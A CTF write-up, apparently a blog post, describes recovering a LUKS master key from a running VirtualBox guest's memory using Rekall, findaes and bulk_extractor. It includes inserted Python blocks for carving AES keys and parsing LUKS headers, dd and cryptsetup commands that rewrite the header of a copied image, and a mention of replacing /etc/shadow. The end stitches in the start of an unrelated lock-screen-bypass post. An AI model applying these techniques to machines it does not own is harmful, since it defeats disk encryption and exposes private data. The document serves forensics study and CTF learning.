<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieW4xnYmhDDvM_jiEwRzjW6q1QlQaQS7MIOm0wDs1nSphTYKuMHG6NpNUCWlPbTHzSfvjBiIAh03EeGm-VcmxtJI_ehChD7WqxYnAtiDLMkXdUx0nqhzvYJPNONddnOgzfEjY8lz53wvem/s1600/dd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieW4xnYmhDDvM_jiEwRzjW6q1QlQaQS7MIOm0wDs1nSphTYKuMHG6NpNUCWlPbTHzSfvjBiIAh03EeGm-VcmxtJI_ehChD7WqxYnAtiDLMkXdUx0nqhzvYJPNONddnOgzfEjY8lz53wvem/s400/dd.PNG" width="400" /></a></div>
<br />
Let's identify the raw image and mount it externally:<br />
<div class="code">
sudo fdisk -lu safe.dd
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxhdRwQOuwSPK1FQjMDogf7Q8J2XNfme3W2riGyqTwkzUsFiaFwW7YOoEwpDsTkaHHiEQd3byEXJw8BVlcSbh5NaaY07QwmwO6Rgr5w9943sDbKqgW-rbSDJqZBTPGvCwoJ7F7I1VYk26l/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxhdRwQOuwSPK1FQjMDogf7Q8J2XNfme3W2riGyqTwkzUsFiaFwW7YOoEwpDsTkaHHiEQd3byEXJw8BVlcSbh5NaaY07QwmwO6Rgr5w9943sDbKqgW-rbSDJqZBTPGvCwoJ7F7I1VYk26l/s400/Screenshot-Terminal.png" width="400" /></a></div>
<br />
<div class="code">
sudo losetup -o 1048576 /dev/loop0 safe.dd</div>
<div class="code">
sudo lvmdiskscan</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit1VKx-zL4oAMcfL9lxUVD42bwEUEl5CDsdrqxAECRMam_Hl0gSxahx-UfcAJ7kV3ClclRhWSuVuYGuhupV1zK3a-pEmyZMavdaSGym3ndO5AbZTUjhR8of7xNDMIQ7sqBI5ppU4BY7P12/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit1VKx-zL4oAMcfL9lxUVD42bwEUEl5CDsdrqxAECRMam_Hl0gSxahx-UfcAJ7kV3ClclRhWSuVuYGuhupV1zK3a-pEmyZMavdaSGym3ndO5AbZTUjhR8of7xNDMIQ7sqBI5ppU4BY7P12/s400/Screenshot-Terminal-1.png" width="400" /></a></div>
<br />
There are two interesting devices, /dev/vg/root and /dev/vg/home. Let's 1 - mount the home folder, 2 - grab the flag and 3 - PROFIT!!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EyxMQvGBcoaKBuqZfca4Y6WgDpsenDuxEyYaX4Ytzq8oX28y-nq7Th78UtalXTI2XzieyQAeoq7_muE_cbUz0GecjuPf1lE_2Xoc9Q-7fztMgkMk9WS0e4P_wBT5GkGExhuDfmwqERVX/s1600/disk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EyxMQvGBcoaKBuqZfca4Y6WgDpsenDuxEyYaX4Ytzq8oX28y-nq7Th78UtalXTI2XzieyQAeoq7_muE_cbUz0GecjuPf1lE_2Xoc9Q-7fztMgkMk9WS0e4P_wBT5GkGExhuDfmwqERVX/s320/disk.png" width="320" /></a></div>
<br />
Oh noes, the disk is encrypted... I couldn't find any useful data on the root device (/dev/vg/root). I tried to crack some local password hashes but I didn't get anything and logs/history files didn't reveal any secrets. Time to unleash some CSI skills and perform live memory forensics.<br />
<br />
<b><br /></b>
<b>Memory Forensics: Rekall</b><br />
<br />
Unlike VMWare virtual machines, VirtualBox does not offer an easy-to-use memory dump (as far as I know). What do we do now? It's time to perform <a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">VM introspection with Rekall</a>.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPtFXqZn0MXBPyiMhYYNfQuHpMwfgCRFg8AAfzXJFoZvIoso0pz15obvB9MRVKhIzMFWlrAV7ecBtgdTExD0FrMZdm2hrzQ3w0kecAqCTXCRYj8FI-freCaOf42olh6ejgr67RTHPMhkjk/s1600/inception.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPtFXqZn0MXBPyiMhYYNfQuHpMwfgCRFg8AAfzXJFoZvIoso0pz15obvB9MRVKhIzMFWlrAV7ecBtgdTExD0FrMZdm2hrzQ3w0kecAqCTXCRYj8FI-freCaOf42olh6ejgr67RTHPMhkjk/s400/inception.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Memory Analysis Inception</td></tr>
</tbody></table>
Rekall is the first memory framework to support transparent introspection of VMs with any host-guest OS combination and is independent of the virtualization software layer.<br />
<br />
<b><br /></b>
<b>Building the Profile</b><br />
<b><br /></b>
Linux support in Rekall requires a profile tailored to the running kernel as well as the System.map file. The profile file contains all the debugging symbols extracted into a Rekall standard profile format. To generate this file, it is necessary to build a kernel module with debugging symbols enabled, and then parse the DWARF debugging symbols.<br />
<br />
The operating system is a Debian 7.9 i686, with 3.2.0-4-486 Kernel.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGALulCSGZ7IzFhzjXMIie6Jajjd7-5cWiA_A-xHJ55VgCAOjyOd5MCD_1sFtCDgyvBtiwMp6DJwl4CCkGTtHF2uP2XHgkcfUY74Vn_-6ovzhSRiDCYd7umJDSdHTWiPjPv0x7PTf0gB9f/s1600/deb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGALulCSGZ7IzFhzjXMIie6Jajjd7-5cWiA_A-xHJ55VgCAOjyOd5MCD_1sFtCDgyvBtiwMp6DJwl4CCkGTtHF2uP2XHgkcfUY74Vn_-6ovzhSRiDCYd7umJDSdHTWiPjPv0x7PTf0gB9f/s400/deb.png" width="400" /></a></div>
<br />
The <a href="https://github.com/google/rekall/tree/master/tools/linux">Linux Guide</a> from <a href="https://github.com/google/rekall/tree/master/tools/linux">rekall repository</a> is pretty straightforward. I downloaded a <a href="http://cdimage.debian.org/cdimage/archive/7.9.0/i386/iso-dvd/">Debian 7.9 i386 ISO</a>, installed it on a clean system, installed the Kernel headers from the target VM and built the corresponding profiles. I mirrored them here:<br />
<div>
<ul>
<li><a href="https://github.com/bmaia/rekall-profiles">https://github.com/bmaia/rekall-profiles</a></li>
</ul>
</div>
<div>
<b><br /></b></div>
<div>
<b>Memory Analysis Inception</b></div>
<br />
Now that we have the proper profile, we can run VirtualBox, start the VM and perform live forensics on the guest machine.<br />
<br />
The <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/VmScan.html">vmscan plugin</a> scans the physical memory attempting to find hypervisors and group them together logically as virtual machines.<br />
<br />
It's possible to run plugins on any VM by using the --ept (<a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">Extended Page Tables</a>) parameter on the command line. To run a rekall plugin on a VM that vmscan found, invoke rekall as you normally would, but add --ept EPT_VALUE as a parameter.<br />
<br />
<div class="code">
rekal -f \\.\pmem vmscan --live</div>
<div class="code">
rekal.exe -f \\.\pmem --profile Debian-3.2.0-4-486.zip --ept 0x1ECC0701E</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJa8lNUqxgifyzKQvYdQxmV9mQx4PxK-f1XUmsZ4O1PL3-e3GjtcB7EwReS6K9D74l3ykRtrecFssdXKH4vr3MGZuotcP_9bJL2yG_tsx4Ewcpu1Khh73FYTHKDghll7Xl1M8LvWMiT1V/s1600/success.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJa8lNUqxgifyzKQvYdQxmV9mQx4PxK-f1XUmsZ4O1PL3-e3GjtcB7EwReS6K9D74l3ykRtrecFssdXKH4vr3MGZuotcP_9bJL2yG_tsx4Ewcpu1Khh73FYTHKDghll7Xl1M8LvWMiT1V/s400/success.PNG" width="400" /></a></div>
<br />
I tried to use the base <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/Linux/">plugins that support Linux analysis</a>, but none of them revealed the secrets necessary to decrypt the disk.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSbILjB-Jq6FRmFnJ3e5I-FBAAXYUeS0Ba2WPreXj8qZSrssu60O5XAWHl_qtQNd0X3KYbrQYKVYGBG0PQb_5QlTUWI4pkWe45Uv3WAGq2-kpSpVGfk0TojCNZhL-MKocZMcLV0QVMFcR4/s1600/netstat.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSbILjB-Jq6FRmFnJ3e5I-FBAAXYUeS0Ba2WPreXj8qZSrssu60O5XAWHl_qtQNd0X3KYbrQYKVYGBG0PQb_5QlTUWI4pkWe45Uv3WAGq2-kpSpVGfk0TojCNZhL-MKocZMcLV0QVMFcR4/s400/netstat.PNG" width="400" /></a></div>
<br />
After some time I decided to take a different approach and <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/ImageCopy.html">dump the full memory</a> from the Guest VM and carve for some secrets.<br />
<br />
<div class="code">
imagecopy output_image='memdump.raw'</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhub2zDrEtysN4TqxCcA1vsW2UR5wRa2H3KNfuXlrxmgqbQu-SMIYngq4B5pTykO2KpQVdaGuxPa1f9c5nyAoR2Sm6shJGwIEOb19DunTkwPf3gyXy9YhqdtkqlbShpoJdX5QgxoViDemSb/s1600/memdump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhub2zDrEtysN4TqxCcA1vsW2UR5wRa2H3KNfuXlrxmgqbQu-SMIYngq4B5pTykO2KpQVdaGuxPa1f9c5nyAoR2Sm6shJGwIEOb19DunTkwPf3gyXy9YhqdtkqlbShpoJdX5QgxoViDemSb/s400/memdump.PNG" width="400" /></a></div>
<br />
<b><br /></b>
<b>Extracting AES Keys from the Memory Dump</b><br />
<br />
You can use tools like <a href="https://github.com/simsong/bulk_extractor">bulk_extractor</a> and <a href="http://jessekornblum.livejournal.com/269749.html">findaes</a> to extract AES keys from memory dumps. These programs work by carving the images and eliminating anything which is not a valid AES key schedule.<br />
<br />
<div class="code">
./findaes memdump.raw</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85uGmZxI0mNp9ijeV_JG_nFPsqf_hmlzTLZXLAx4DMOiEASS0vbhin_KuHw3-E8y_o-7W9_geI2CtrWGu0qad4lSDW7MDdHqobTRqIHOHHI4fWXc2GB6eoBz01jqBnRbliBicNyu5icbT/s1600/findaes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85uGmZxI0mNp9ijeV_JG_nFPsqf_hmlzTLZXLAx4DMOiEASS0vbhin_KuHw3-E8y_o-7W9_geI2CtrWGu0qad4lSDW7MDdHqobTRqIHOHHI4fWXc2GB6eoBz01jqBnRbliBicNyu5icbT/s400/findaes.png" width="400" /></a></div>
<br />
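How findaes and bulk_extractor recognise a key without knowing it, as an added example that is not part of the original post or of either tool: every 16-byte window of the image is treated as a candidate AES-128 key, its key schedule is recomputed and compared with the 160 bytes that follow it in memory; random bytes almost never pass that test, so no wordlist or key database is needed. The memory image below is constructed (random bytes around one embedded schedule), and the key fed in is the one the post recovered, used only as demo input.<br />
<br />
```python
"""Carve AES-128 key schedules from a raw memory image.

A mounted dm-crypt/LUKS volume keeps its expanded AES round keys in kernel
memory. findaes and bulk_extractor locate them by treating every 16-byte
window of the image as a candidate key, expanding it with the AES key
schedule and checking whether that expansion is exactly what follows in
memory. This is a minimal re-implementation of that test.
"""
import random


def _build_sbox():
    """AES S-box: multiplicative inverse in GF(2^8) followed by the affine map."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF  # p *= 3 (a generator)
        q = (q ^ (q << 1)) & 0xFF                               # q /= 3, so q == 1/p
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        rotl = lambda x, s: ((x << s) | (x >> (8 - s))) & 0xFF
        sbox[p] = q ^ rotl(q, 1) ^ rotl(q, 2) ^ rotl(q, 3) ^ rotl(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
SCHEDULE_LEN = 176   # 11 round keys x 16 bytes for AES-128


def _next_word(prev, four_back, i):
    """Key-schedule word w[i] from w[i-1] and w[i-4] (AES-128, Nk = 4)."""
    t = list(prev)
    if i % 4 == 0:
        t = t[1:] + t[:1]               # RotWord
        t = [SBOX[b] for b in t]        # SubWord
        t[0] ^= RCON[i // 4 - 1]        # Rcon
    return bytes(a ^ b for a, b in zip(four_back, t))


def expand_key_128(key):
    """Return the 176-byte AES-128 key schedule for a 16-byte key."""
    if len(key) != 16:
        raise ValueError("AES-128 key must be 16 bytes")
    words = [bytes(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        words.append(_next_word(words[i - 1], words[i - 4], i))
    return b"".join(words)


def find_aes128_keys(image):
    """Return [(offset, key)] for every window whose expansion follows it in memory."""
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        cand = image[off:off + 16]
        # Cheap pre-filter: recompute only w[4] before paying for a full expansion.
        if _next_word(cand[12:16], cand[0:4], 4) != image[off + 16:off + 20]:
            continue
        if expand_key_128(cand) == image[off:off + SCHEDULE_LEN]:
            hits.append((off, bytes(cand)))
    return hits


def build_demo_image(key, noise_len=4096, seed=7):
    """Constructed stand-in for a memory dump: noise, one key schedule, noise."""
    rnd = random.Random(seed)
    noise = lambda n: bytes(rnd.getrandbits(8) for _ in range(n))
    return noise(noise_len) + expand_key_128(key) + noise(noise_len)


if __name__ == "__main__":
    # Master key the write-up recovered, used here only as demo input.
    demo_key = bytes.fromhex("1fab015c1e3df9eac8728f65d3d16646")
    for off, key in find_aes128_keys(build_demo_image(demo_key)):
        print(f"AES-128 key schedule at offset {off:#x}: {key.hex()}")
```
<br />
On a real memdump.raw, read the file into a bytes object and pass it to find_aes128_keys; the w[4] pre-filter keeps the pure-Python loop tolerable, but for multi-gigabyte dumps the C tools are the right choice. AES-256 keys, like the one bulk_extractor reported from the lab dump, need the Nk = 8 variant of the schedule, which this block leaves out.<br />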
The tools found an AES-128 key, and I now needed to recreate this behavior in a lab to make sure that it was the encryption master key. I set up an encrypted volume on a Debian installation and dumped the master keys using cryptsetup:<br />
<br />
<div class="code">
cryptsetup luksDump --dump-master-key /dev/sda5</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk-qX5BH7tuIJ7iC_RdcSAwIkdqSjuDX7g6V2Ksl3tDamM1Ob2RiGIlxXN-8h-Y4GIssf5q2p7jyqc4kCmbilEgCreIcOIQ4uhx6n4flNaHphyEirQQw4GtgaVV7sbE4jVgLpP_vMDcQ1D/s1600/b1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk-qX5BH7tuIJ7iC_RdcSAwIkdqSjuDX7g6V2Ksl3tDamM1Ob2RiGIlxXN-8h-Y4GIssf5q2p7jyqc4kCmbilEgCreIcOIQ4uhx6n4flNaHphyEirQQw4GtgaVV7sbE4jVgLpP_vMDcQ1D/s400/b1.png" width="400" /></a></div>
<br />
After that, I dumped the operating system memory and used bulk_extractor to search for AES Keys:<br />
<br />
<div class="code">
bulk_extractor memdump.raw</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsXLkaYDQZnnMkHHDph0CiX3pLjxM_78Z1jxfmGihfqLvZygS1FUUzgHkwZ_vBwmy_ZAgDmYyXJisflgbkUwOZMAkdpzlZjiKZPuzhyC92QjyIOzNSbzJ8gQyz7iXQn-Wz2lK5usYW4yUV/s1600/b2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsXLkaYDQZnnMkHHDph0CiX3pLjxM_78Z1jxfmGihfqLvZygS1FUUzgHkwZ_vBwmy_ZAgDmYyXJisflgbkUwOZMAkdpzlZjiKZPuzhyC92QjyIOzNSbzJ8gQyz7iXQn-Wz2lK5usYW4yUV/s400/b2.png" width="400" /></a></div>
<br />
The AES256 key matches the MK dump, which brings us to the final step.<br />
<br />
<b><br /></b>
<b>Decrypting LUKS volume using the Master Key</b><br />
<br />
Now that we have the AES key, all we need to do is follow this guide - <a href="http://b87.nl/cryptsetup-and-the-master-key">Cryptsetup and the master key</a> - and decrypt '/dev/vg/home'. There's no command-line option to decrypt the disk using the master key; everything is kind of hackish (you need to corrupt the header and create a new one using the key).<br />
<br />
<div class="code">
sudo losetup -o 1048576 /dev/loop1 safe.dd</div>
<div class="code">
cryptsetup -v luksDump /dev/vg/home</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw3QROA9R_xNlUSQSf7iIDJZif0ELeJmq-1h7D5uuvM3AztFG7cRrdkyCPrfhEJnaEwRldrQ7KFX4YRXGoWsdCInJIpz2Oj3MEejmZAu32SubNBnpoPZyHU_YNHRP1ICYgyBxMPZI3lsgz/s1600/Screenshot-Terminal-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw3QROA9R_xNlUSQSf7iIDJZif0ELeJmq-1h7D5uuvM3AztFG7cRrdkyCPrfhEJnaEwRldrQ7KFX4YRXGoWsdCInJIpz2Oj3MEejmZAu32SubNBnpoPZyHU_YNHRP1ICYgyBxMPZI3lsgz/s400/Screenshot-Terminal-2.png" width="400" /></a></div>
<br />
The Master Key (MK) has 128 bits, which is a good sign. The payload offset is 2048 sectors and we need to do some basic math here to get the LUKS header size: 2048 * 512 / 1024 = 1024 (fdisk -l shows that the sector size is 512 bytes).<br />
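The fields luksDump prints come straight from the first 592 bytes of the device, and the same header lets you confirm a carved key before touching the disk: LUKS1 stores PBKDF2(master key, mk-digest-salt, mk-digest-iter) truncated to 20 bytes, so a candidate from the memory dump can be checked against it offline, with no passphrase and nothing overwritten. The parser and check below are an added example, not the post's commands or cryptsetup's code; the header it parses is constructed in the block, and the demo key is the one from the post.<br />
<br />
```python
"""Read a LUKS1 header and check a carved master key against its MK digest.

Constructed example. The phdr layout follows the LUKS1 on-disk format
specification (all integers big-endian); a real header is the first 592
bytes of the device, e.g. what `dd if=/dev/vg/home bs=592 count=1` copies.
"""
import hashlib
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
SECTOR_SIZE = 512
SLOT_ENABLED, SLOT_DISABLED = 0x00AC71F3, 0x0000DEAD
_PHDR = struct.Struct(">6sH32s32s32sII20s32sI40s")  # 208 bytes
_SLOT = struct.Struct(">II32sII")                    # 48 bytes, 8 slots follow
HEADER_STRUCT_LEN = _PHDR.size + 8 * _SLOT.size      # 592 bytes


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("ascii")


def parse_luks1_header(blob):
    """Return the fields `cryptsetup luksDump` prints, from the device's first 592 bytes."""
    if len(blob) < HEADER_STRUCT_LEN:
        raise ValueError("short header")
    (magic, version, cipher, mode, hspec, payload_off, key_bytes,
     mk_digest, mk_salt, mk_iter, uuid) = _PHDR.unpack_from(blob, 0)
    if magic != LUKS_MAGIC or version != 1:
        raise ValueError("not a LUKS1 header")
    slots = []
    for n in range(8):
        active, iters, salt, km_off, stripes = _SLOT.unpack_from(
            blob, _PHDR.size + n * _SLOT.size)
        slots.append({"enabled": active == SLOT_ENABLED, "iterations": iters,
                      "key_material_offset": km_off, "stripes": stripes})
    return {
        "cipher": _cstr(cipher), "mode": _cstr(mode), "hash": _cstr(hspec),
        "payload_offset": payload_off,                 # in 512-byte sectors
        "header_bytes": payload_off * SECTOR_SIZE,     # the 2048 * 512 from the post
        "key_bits": key_bytes * 8,
        "mk_digest": mk_digest, "mk_salt": mk_salt, "mk_iter": mk_iter,
        "uuid": _cstr(uuid), "slots": slots,
    }


def master_key_matches(hdr, candidate):
    """True if `candidate` reproduces the header's MK digest (no passphrase needed)."""
    if len(candidate) * 8 != hdr["key_bits"]:
        return False
    digest = hashlib.pbkdf2_hmac(hdr["hash"], candidate, hdr["mk_salt"], hdr["mk_iter"], 20)
    return digest == hdr["mk_digest"]


def build_demo_header(master_key, cipher="aes", mode="ecb", hspec="sha1",
                      payload_sectors=2048, mk_iter=1000):
    """Constructed header for the demo; a real one comes from `dd` of the device."""
    salt = bytes(range(32))
    digest = hashlib.pbkdf2_hmac(hspec, master_key, salt, mk_iter, 20)
    phdr = _PHDR.pack(LUKS_MAGIC, 1, cipher.encode(), mode.encode(), hspec.encode(),
                      payload_sectors, len(master_key), digest, salt, mk_iter,
                      b"00000000-0000-0000-0000-000000000000")
    slots = b"".join(_SLOT.pack(SLOT_DISABLED, 0, bytes(32), 8 + n * 504, 4000)
                     for n in range(8))
    return phdr + slots


if __name__ == "__main__":
    mk = bytes.fromhex("1fab015c1e3df9eac8728f65d3d16646")  # key from the write-up, demo input only
    hdr = parse_luks1_header(build_demo_header(mk))
    print(f"cipher {hdr['cipher']}-{hdr['mode']}, hash {hdr['hash']}, MK {hdr['key_bits']} bits")
    print(f"payload offset {hdr['payload_offset']} sectors = {hdr['header_bytes']} bytes")
    print("carved key matches MK digest:", master_key_matches(hdr, mk))
```
<br />
Against the real device, feed the first 592 bytes of /dev/vg/home to parse_luks1_header and every findaes hit to master_key_matches; a True result means the key can be used with the header rewrite that follows, a False one saves you from corrupting the header with the wrong key.<br />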
<br />
We now proceed to write a new LUKS header on the device using the extracted MK, assigning a new passphrase:<br />
<br />
<div class="code">
dd if=/dev/vg/home of=test.img<br />
hexdump -C -n 80 test.img<br />
dd if=/dev/zero of=test.img conv=notrunc bs=1024 count=1<br />
hexdump -C -v -n 80 test.img<br />
echo 1fab015c1e3df9eac8728f65d3d16646 | xxd -r -p > key.bin</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8vitnVHsq3GHaW9XM8paS__C3XZ5_dqqTtk5OxUl_tyUxm4yd8anm-nyPun9MccEKRHSMupu9ebN2yrUWMJOXKbJEcOca33zdmwWl4l3PwuwrJQ6k1A8AHtQErkcCPdD94B0yFqm0EWxc/s1600/Screenshot-Terminal-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8vitnVHsq3GHaW9XM8paS__C3XZ5_dqqTtk5OxUl_tyUxm4yd8anm-nyPun9MccEKRHSMupu9ebN2yrUWMJOXKbJEcOca33zdmwWl4l3PwuwrJQ6k1A8AHtQErkcCPdD94B0yFqm0EWxc/s400/Screenshot-Terminal-3.png" width="400" /></a></div>
<br />
<div class="code">
cryptsetup luksFormat --verify-passphrase --cipher=aes-ecb --hash=sha1 --key-size=128 --master-key-file=key.bin test.img</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4PdxzFXy4H2bB7IQelWf0Vb5oHS3PxFyKpJFRn-TVJkXYtNCy5swdNdfotsDj4A2FbHeCNkgPXea22JpDvEIbd4wBYwNEc9LLbnFZCswSWgl9M184lGWrGgHBWKyaDy6RlGmBM5UqxanO/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4PdxzFXy4H2bB7IQelWf0Vb5oHS3PxFyKpJFRn-TVJkXYtNCy5swdNdfotsDj4A2FbHeCNkgPXea22JpDvEIbd4wBYwNEc9LLbnFZCswSWgl9M184lGWrGgHBWKyaDy6RlGmBM5UqxanO/s400/Screenshot-Terminal-4.png" width="400" /></a></div>
<br />
They tried to hide the flag from "/bin/cat" using the carriage return char (0x0D), but hexdump and Pluma had no problems displaying it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Off_ltW8nYdsITjSlEeFqYCAr9LQrn5oxiePU_xjF1g7VWV5quhjhkciryRB64H2BdkQ_Xf01mq6s6kDDPuM3GoEx2DsP9i3v1GEf3Ql-PNdOXSPXNCUo1NACxmgunhFJHq4RHqzfcnh/s1600/final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Off_ltW8nYdsITjSlEeFqYCAr9LQrn5oxiePU_xjF1g7VWV5quhjhkciryRB64H2BdkQ_Xf01mq6s6kDDPuM3GoEx2DsP9i3v1GEf3Ql-PNdOXSPXNCUo1NACxmgunhFJHq4RHqzfcnh/s400/final.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYcvW9by1nWKuo6cfp6wfWHB98vM6Xqx5-kRyAhoUqncQeEbtX7PLBMEaYwdexG3bHWKmFs6QeycaFwhGDtO_-i9D3zJ0-X5_bdZTLSq7jzsUniD9jwNf14KIEH5A5HRC4fWSOdx_Qf27g/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYcvW9by1nWKuo6cfp6wfWHB98vM6Xqx5-kRyAhoUqncQeEbtX7PLBMEaYwdexG3bHWKmFs6QeycaFwhGDtO_-i9D3zJ0-X5_bdZTLSq7jzsUniD9jwNf14KIEH5A5HRC4fWSOdx_Qf27g/s400/Screenshot-Terminal-5.png" width="400" /></a></div>
<br />
<br />
Flag: <b>flag{v0t3_f0r_p3dr0}</b><br />
<b><br /></b>
<b><br /></b><b>Update 1: </b><a href="https://twitter.com/rbaranyi">@rbaranyi</a> and <a href="https://plus.google.com/107016163963660206221">David Berard</a> pointed out that replacing '/etc/shadow', logging in with the known password and then using 'strings /dev/lvm' would be easier. That's true, but that wouldn't involve any kind of <a href="http://cdn.meme.am/instances/500x/65198356.jpg">memory inception</a>.<br />
<br />
<b>Update 2: </b><a href="https://plus.google.com/107016163963660206221">David Berard</a> pointed out that <a href="https://gitlab.com/cryptsetup/cryptsetup/wikis/FrequentlyAskedQuestions#6-backup-and-data-recovery">newer 'cryptsetup' offers an option to set a new passphrase using the master key</a>: 'cryptsetup luksAddKey --master-key-file=<master-key-file> <luks device>'<br />
<br />
<b>Update 3:</b> According to the <a href="https://github.com/xwings/tuya/tree/master/ctf2015/hack.lu/drbob150">writeup from CLGT</a>, you can also dump VirtualBox RAM using this administrative command: 'VBoxManage debugvm SafeClone dumpvmcore --filename=getthekey'<br />
<br />
<b>Update 4:</b> Some teams used the <a href="https://github.com/c1fe/dm_dump/">dm_dump</a> volatility plugin: it identifies disks on the target system which were mounted using the device-mapper framework. The output of this plugin gives you the arguments to pass to the dmsetup command to remount the original unencrypted file system on a different machine.<br />
<br />
Bernardo Rodrigues<br />
<br />
<b>Mac OS X 10.11 Partial Lock Screen Bypass</b> (2015-10-07)<br />
<br />
Lock screen bypasses are becoming mainstream. The most notable recent bypasses are <a href="https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572">the one from Ubuntu 14.04</a> (hold Enter, the lock screen crashes, the computer is unlocked) and <a href="http://sites.utexas.edu/iso/2015/09/15/android-5-lockscreen-bypass/">the one from Android 5.x</a> (input large strings in the password field, destabilize the lock screen, crash to the home screen).<br />
<br />
